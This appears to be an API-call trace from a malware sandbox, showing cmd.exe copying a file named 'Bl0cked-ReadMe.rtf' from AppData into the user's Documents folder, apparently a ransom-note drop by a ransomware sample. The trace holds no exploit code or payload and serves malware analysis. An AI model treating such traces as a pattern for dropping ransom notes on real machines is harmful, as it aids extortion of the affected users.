[0236.987] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.987] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0236.987] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.987] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.987] GetEnvironmentStringsW () returned 0x3e22b8* [0236.987] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0236.987] GetEnvironmentVariableW 
(in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.987] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.987] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.987] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.987] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.987] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.987] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.987] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.987] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.987] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef768 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef768, lpFilePart=0x2ef764 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef764*="Desktop") returned 0x18 [0236.987] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.987] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4e4 | out: lpFindFileData=0x2ef4e4) returned 0x3dfff8 [0236.987] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0236.988] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4e4 | out: lpFindFileData=0x2ef4e4) returned 0x3dfff8 [0236.988] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0236.988] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4e4 | out: lpFindFileData=0x2ef4e4) returned 0x3dfff8 [0236.988] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0236.988] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.988] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.988] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.988] GetEnvironmentStringsW () returned 0x3e2ad8* [0236.988] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0236.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.989] GetConsoleOutputCP () returned 0x1b5 [0236.989] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.989] GetUserDefaultLCID () returned 0x409 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef8a8, cchData=128 | out: lpLCData="1") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2 [0236.990] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2 [0236.990] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.990] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.991] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.991] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.991] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.991] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.991] _wcsicmp (_String1="type", _String2=")") returned 75 [0236.991] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0236.991] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0236.991] _wcsicmp (_String1="IF", _String2="type") returned -11 [0236.991] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0236.991] _wcsicmp (_String1="REM", _String2="type") returned -2 [0236.991] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0236.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.995] GetFileType (hFile=0x7) returned 0x2 [0236.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0236.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef7a0 | out: lpMode=0x2ef7a0) returned 1 [0236.995] _dup (_FileHandle=1) returned 3 [0236.995] 
_close (_FileHandle=1) returned 0 [0236.996] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0236.996] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef770, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0236.997] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0236.997] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.997] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0236.997] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0236.997] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0236.997] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0236.997] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.998] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef104) returned 0x3d0e50 [0236.998] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0236.998] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0236.998] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0236.998] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee010, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0236.998] 
_open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] GetFileType (hFile=0x54) returned 0x1 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee068 | out: lpFileSizeHigh=0x2ee068*=0x0) returned 0x1632 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.998] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0236.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.999] GetFileType (hFile=0x4c) returned 0x1 [0236.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.999] GetFileType (hFile=0x4c) returned 0x1 [0236.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.999] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, 
lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] GetFileType (hFile=0x4c) returned 0x1 [0237.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.000] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.001] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.001] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 
0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] GetFileType (hFile=0x4c) returned 0x1 [0237.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.001] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.002] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.002] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) 
returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] GetFileType (hFile=0x4c) returned 0x1 [0237.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.002] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.003] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.003] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.003] GetFileType (hFile=0x4c) returned 0x1 [0237.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] GetFileType (hFile=0x4c) returned 0x1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] GetFileType (hFile=0x4c) returned 0x1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.102] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.102] ReadFile 
(in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] 
